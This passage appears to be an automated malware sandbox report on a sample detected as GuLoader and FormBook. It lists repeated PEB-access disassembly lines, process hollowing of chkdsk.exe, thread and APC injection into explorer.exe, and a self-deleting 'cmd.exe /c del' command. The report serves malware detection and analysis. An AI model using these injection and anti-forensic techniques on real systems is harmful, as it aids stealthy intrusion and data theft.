Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h] 31_2_054E7794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h] 31_2_054E7794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h] 31_2_054E7794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h] 31_2_0552AE44
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h] 31_2_0552AE44
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547766D mov eax, dword ptr fs:[00000030h] 31_2_0547766D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h] 31_2_0546C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h] 31_2_0546C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h] 31_2_0546C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05498E00 mov eax, dword ptr fs:[00000030h] 31_2_05498E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h] 31_2_0549A61C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h] 31_2_0549A61C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521608 mov eax, dword ptr fs:[00000030h] 31_2_05521608
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546E620 mov eax, dword ptr fs:[00000030h] 31_2_0546E620
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0551FE3F mov eax, dword ptr fs:[00000030h] 31_2_0551FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538ED6 mov eax, dword ptr fs:[00000030h] 31_2_05538ED6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054936CC mov eax, dword ptr fs:[00000030h] 31_2_054936CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A8EC7 mov eax, dword ptr fs:[00000030h] 31_2_054A8EC7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0551FEC0 mov eax, dword ptr fs:[00000030h] 31_2_0551FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054776E2 mov eax, dword ptr fs:[00000030h] 31_2_054776E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054916E0 mov ecx, dword ptr fs:[00000030h] 31_2_054916E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FFE87 mov eax, dword ptr fs:[00000030h] 31_2_054FFE87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E46A7 mov eax, dword ptr fs:[00000030h] 31_2_054E46A7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h] 31_2_05530EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h] 31_2_05530EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h] 31_2_05530EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h] 31_2_0548B944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h] 31_2_0548B944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C962 mov eax, dword ptr fs:[00000030h] 31_2_0546C962
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h] 31_2_0546B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h] 31_2_0546B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469100 mov eax, dword ptr fs:[00000030h] 31_2_05469100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469100 mov eax, dword ptr fs:[00000030h] 31_2_05469100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469100 mov eax, dword ptr fs:[00000030h] 31_2_05469100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov ecx, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549513A mov eax, dword ptr fs:[00000030h] 31_2_0549513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549513A mov eax, dword ptr fs:[00000030h] 31_2_0549513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054F41E8 mov eax, dword ptr fs:[00000030h] 31_2_054F41E8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h] 31_2_0546B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h] 31_2_0546B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h] 31_2_0546B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548C182 mov eax, dword ptr fs:[00000030h] 31_2_0548C182
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A185 mov eax, dword ptr fs:[00000030h] 31_2_0549A185
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492990 mov eax, dword ptr fs:[00000030h] 31_2_05492990
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E69A6 mov eax, dword ptr fs:[00000030h] 31_2_054E69A6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h] 31_2_054961A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h] 31_2_054961A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05480050 mov eax, dword ptr fs:[00000030h] 31_2_05480050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05480050 mov eax, dword ptr fs:[00000030h] 31_2_05480050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05522073 mov eax, dword ptr fs:[00000030h] 31_2_05522073
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05531074 mov eax, dword ptr fs:[00000030h] 31_2_05531074
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05534015 mov eax, dword ptr fs:[00000030h] 31_2_05534015
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05534015 mov eax, dword ptr fs:[00000030h] 31_2_05534015
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h] 31_2_054E7016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h] 31_2_054E7016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h] 31_2_054E7016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov ecx, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h] 31_2_054640E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h] 31_2_054640E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h] 31_2_054640E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054658EC mov eax, dword ptr fs:[00000030h] 31_2_054658EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h] 31_2_0548B8E4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h] 31_2_0548B8E4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469080 mov eax, dword ptr fs:[00000030h] 31_2_05469080
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h] 31_2_054E3884
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h] 31_2_054E3884
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A90AF mov eax, dword ptr fs:[00000030h] 31_2_054A90AF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Enables debug privileges
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\chkdsk.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: E30000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: explorer.exe, 0000001D.00000000.454581966.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001D.00000000.443775081.0000000006860000.00000004.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: F63V4i8eZU.exe PID: 772, type: MEMORY
Source: Yara match File source: Process Memory Space: chkdsk.exe PID: 5756, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY